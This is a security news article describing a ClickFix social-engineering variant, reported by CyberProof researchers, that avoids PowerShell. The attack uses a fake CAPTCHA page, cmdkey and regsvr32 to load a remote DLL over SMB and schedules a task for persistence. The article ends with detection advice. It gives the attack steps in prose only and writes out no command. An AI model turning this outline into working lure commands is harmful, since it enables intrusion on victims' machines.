A novel variant of the ClickFix attack has recently emerged, introducing a new mechanism that refrains from utilizing PowerShell. This updated approach employs cmdkey and regsvr32, two native Windows utilities, to deliver a remote payload seamlessly, leaving no files on the system.
New Approach in Attack Execution
The ClickFix attack has been a persistent threat in the cybersecurity landscape, leveraging social engineering to manipulate users into executing malicious commands. Previously, attackers used deceptive CAPTCHA pages to trick users into running commands via the Windows Run dialog, typically invoking PowerShell. However, this latest iteration completely bypasses PowerShell, complicating detection by traditional security tools.
Researchers from CyberProof, led by Deepak Nayak, Kithu Shajil, and Veena Sagar, have documented this new ClickFix variant, revealing their findings on April 22, 2026. The attack uses a streamlined command sequence that stores credentials, retrieves a remote DLL, and executes it silently using trusted Windows components. This approach allows attackers to mask their activities within normal system operations, significantly impeding detection efforts.
Implications for Security Measures
The shift away from PowerShell to native Windows tools, known as Living off the Land Binaries (LOLBins), presents a challenge for organizations dependent on behavioral detection methods. Traditional security systems searching for unusual software installations or processes might overlook this attack, as it relies on built-in Windows functionalities.
Initiating the attack requires only a single command entered into the Windows Run dialog, which triggers a multi-stage process that can persist on a system and establish connections to attacker-controlled infrastructures. This ease of execution makes the threat accessible to a wide range of users, from individuals to corporate environments.
Understanding the Attack Chain
The attack commences when a user navigates to a fraudulent phishing site resembling a CAPTCHA verification page. Users are instructed to open the Windows Run dialog with Win + R, paste a pre-loaded command, and hit Enter. This command involves cmd.exe, executing two primary actions: storing credentials with cmdkey for a remote IP address under the username ‘guest,’ and using regsvr32 to silently load a DLL from the attacker’s SMB share.
A deceptive REM comment within the command, stating ‘I am not a robot,’ aims to obscure the malicious nature of the action, making it appear as a legitimate verification step. Once the DLL is executed by regsvr32, it triggers a hidden CreateProcessA call, creating a scheduled task via Windows Task Scheduler. This task, defined remotely, can be updated by attackers without needing to redeploy the initial DLL, ensuring persistent access with minimal traces.
Countermeasures and Recommendations
Security teams are advised to scrutinize cmdkey activity involving external IPs and monitor regsvr32 for loading remote DLLs via UNC paths. Alerts for chained command execution through cmd.exe and Task Scheduler activities referencing remote XML files should be established. Restricting or closely monitoring outbound SMB and UNC access at the network level is crucial. Educating users about recognizing ClickFix-style social engineering tactics is also essential to prevent unwitting participation in such attacks.
